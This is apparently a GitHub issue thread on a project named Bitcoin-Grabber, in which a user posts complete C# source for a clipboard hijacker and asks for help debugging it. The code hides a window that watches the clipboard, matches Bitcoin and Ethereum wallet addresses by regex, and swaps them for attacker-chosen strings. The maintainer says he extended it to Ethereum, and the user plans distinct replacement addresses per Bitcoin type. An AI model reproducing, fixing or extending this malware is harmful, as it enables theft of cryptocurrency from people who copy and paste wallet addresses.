### ISSUE TITLE
It does not work

### ISSUE THREAD

**Issue by cristyanul** [NYAN-x-CAT/Bitcoin-Grabber#1]
Hi. I tried adding more than one type of  address and ethereum.
Can you help me troubleshoot this issue?

using System;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.Threading;
using System.Text.RegularExpressions;

namespace Bitcoin_Grabber
{
    public class Program
    {
        public static void Main()
        {
            new Thread(() => { Application.Run(new ClipboardNotification.NotificationForm()); }).Start();
        }
    }

    internal static class NativeMethods
    {

        public const int WM_CLIPBOARDUPDATE = 0x031D;
        public static IntPtr HWND_MESSAGE = new IntPtr(-3);

        [DllImport("user32.dll", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        public static extern bool AddClipboardFormatListener(IntPtr hwnd);

        [DllImport("user32.dll", SetLastError = true)]
        public static extern IntPtr SetParent(IntPtr hWndChild, IntPtr hWndNewParent);
    }

    public static class Clipboard
    {
        public static string GetText()
        {
            string ReturnValue = string.Empty;
            Thread STAThread = new Thread(
                delegate ()
                {
                    ReturnValue = System.Windows.Forms.Clipboard.GetText();
                });
            STAThread.SetApartmentState(ApartmentState.STA);
            STAThread.Start();
            STAThread.Join();

            return ReturnValue;
        }

        public static void SetText(string txt)
        {
            Thread STAThread = new Thread(
                delegate ()
                {
                    System.Windows.Forms.Clipboard.SetText(txt);
                });
            STAThread.SetApartmentState(ApartmentState.STA);
            STAThread.Start();
            STAThread.Join();
        }
    }

    public sealed class ClipboardNotification
    {
        public class NotificationForm : Form
        {

            public NotificationForm()
            {
                NativeMethods.SetParent(Handle, NativeMethods.HWND_MESSAGE);
                NativeMethods.AddClipboardFormatListener(Handle);
            }

            protected override void WndProc(ref Message m)
            {
                if (m.Msg == NativeMethods.WM_CLIPBOARDUPDATE)
                {

                    string input = Clipboard.GetText();
                    string bpatterna = @"\b([1])[a-zA-HJ-NP-Z0-9]{26,35}\b";
                    string bpatternb = @"\b([3])[a-zA-HJ-NP-Z0-9]{26,35}\b";
                    string bpatternc = @"\b(bc1)[a-zA-HJ-NP-Z0-9]{36,43}\b";
                    string epattern = @"\b0x[a-fA-F0-9]{40}\b";
                    string bareplacement = "Legacy Hack";
                    string bbreplacement = "Segwit Hack";
                    string bcreplacement = "Native Hack";
                    string ereplacement = "Ethereum Hack";

                    Regex brgx = new Regex(bpatterna);
                    Match bmatch = brgx.Match(input);
                    Regex bbrgx = new Regex(bpatternb);
                    Match bbmatch = bbrgx.Match(input);
                    Regex bcrgx = new Regex(bpatternc);
                    Match bcmatch = bcrgx.Match(input);
                    Regex ergx = new Regex(epattern);
                    Match ematch = ergx.Match(input);
                    if (bmatch.Success)
                    {
                        string aresult = brgx.Replace(input, bareplacement);
                        Clipboard.SetText(aresult);
                    }
                    
                   else if (bbmatch.Success)
                    {
                        string bresult = brgx.Replace(input, bbreplacement);
                        Clipboard.SetText(bresult);
                    }

                   else if (bcmatch.Success)
                    {
                        string cresult = brgx.Replace(input, bcreplacement);
                        Clipboard.SetText(cresult);
                    }

                   else if (ematch.Success)
                    {
                        string dresult = ergx.Replace(input, ereplacement);
                        Clipboard.SetText(dresult);
                    }
                }
                base.WndProc(ref m);
            }
        }

    }
}

**Comment by cristyanul** [comment]
I realized i did not tell you what this issue was.
The code runs but only Legacy addresses work with it.

**Comment by NYAN-x-CAT** [comment]
I added eth and made the code easy to read.

**Comment by cristyanul** [comment]
I also wanted to add separation between types of bitcoin addresses but i will keep trying.
15f6s1c6a..... will be replaced with an address starting with 1
3d5sv1i6a1sd..... will be replaced with an address starting with 3
bc1qg5d4g2vsahgji56.. will be replaced with an address starting in bc1q
